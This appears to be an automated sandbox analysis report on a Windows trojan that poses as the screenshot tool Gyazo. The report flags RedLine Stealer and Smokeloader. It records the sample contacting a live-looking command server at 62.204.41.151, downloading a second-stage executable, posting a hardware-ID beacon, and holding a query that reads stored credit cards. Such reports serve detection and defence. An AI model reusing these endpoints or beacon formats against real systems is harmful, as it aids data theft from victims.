Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 62.204.41.151
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.151Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: iplogger.co

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 62.204.41.151Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 30 46 31 39 46 32 39 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"6FA0F19F29841340093196------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"default------GCBGIIECGHCAKECAFBFH--

Source: 169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/
Source: 169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/0$
Source: 4h1Zc12ZBe.exe, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000747000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000003.1250987099.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exe
Source: 4h1Zc12ZBe.exe	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/edd20096ecef326d.php
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/edd20096ecef326d.phpFC%L
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/edd20096ecef326d.phpRC)L
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/edd20096ecef326d.phpttv
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/ows
Source: 169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151L
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151w
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/
Source: 4h1Zc12ZBe.exe, 4h1Zc12ZBe.exe, 00000000.00000003.1233558531.0000000000751000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1vM485
Source: 4h1Zc12ZBe.exe, 00000000.00000003.1233558531.0000000000751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1vM485#
Source: 4h1Zc12ZBe.exe, 00000000.00000003.1233558531.0000000000751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1vM485h
Source: 4h1Zc12ZBe.exe	String found in binary or memory: https://iplogger.co/1vM485vector
Source: 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/L

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699

Source: unknown

HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00401C78 InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,

0_2_00401C78

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00401C78 InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,

0_2_00401C78

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0042F093	0_2_0042F093
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_004200B0	0_2_004200B0
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0040C118	0_2_0040C118
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0042036B	0_2_0042036B
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00425506	0_2_00425506
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0041F720	0_2_0041F720
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0041F7CD	0_2_0041F7CD
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0042F7A9	0_2_0042F7A9
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0040E8BC	0_2_0040E8BC
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0040B932	0_2_0040B932
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00426A30	0_2_00426A30
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0041FB3F	0_2_0041FB3F
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00435BB4	0_2_00435BB4
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00410CBC	0_2_00410CBC
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0041FDE9	0_2_0041FDE9
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00406E9B	0_2_00406E9B

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: String function: 00407ACB appears 33 times
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: String function: 00407D7F appears 104 times
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: String function: 00408900 appears 55 times

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1068

Source: 4h1Zc12ZBe.exe, 00000000.00000000.1218065332.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameGyazo.exeL vs 4h1Zc12ZBe.exe
Source: 4h1Zc12ZBe.exe	Binary or memory string: OriginalFileNameGyazo.exeL vs 4h1Zc12ZBe.exe

Source: 4h1Zc12ZBe.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 169F.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@1/2

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_004190A0

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6480
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Mutant created: \Sessions\1\BaseNamedObjects\screenshoter

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

File created: C:\Users\user~1\AppData\Local\Temp\169F.tmp

Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Command line argument: screenshoter	0_2_00401132
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Command line argument: Enabled	0_2_00401132
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Command line argument: Main	0_2_00401132
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Command line argument: Main	0_2_00401132

Source: 4h1Zc12ZBe.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsJO;

Source: 4h1Zc12ZBe.exe	Virustotal: Detection: 23%
Source: 4h1Zc12ZBe.exe	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\4h1Zc12ZBe.exe "C:\Users\user\Desktop\4h1Zc12ZBe.exe"
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process created: C:\Users\user\AppData\Local\Temp\169F.tmp.exe "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1068
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process created: C:\Users\user\AppData\Local\Temp\169F.tmp.exe "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 4h1Zc12ZBe.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Unpacked PE file: 3.2.169F.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Unpacked PE file: 3.2.169F.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00416E6B LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00416E6B

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00408946 push ecx; ret	0_2_00408959
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00407D59 push ecx; ret	0_2_00407D6C
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0041A9F5 push ecx; ret	3_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007FAC5C push ecx; ret	3_2_007FAC6F
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0085D2FA push edi; ret	3_2_0085D2FD

Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.647006147595817
Source: 169F.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.647006147595817

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	File created: C:\Users\user\AppData\Local\Temp\169F.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00406E9B GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00406E9B

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
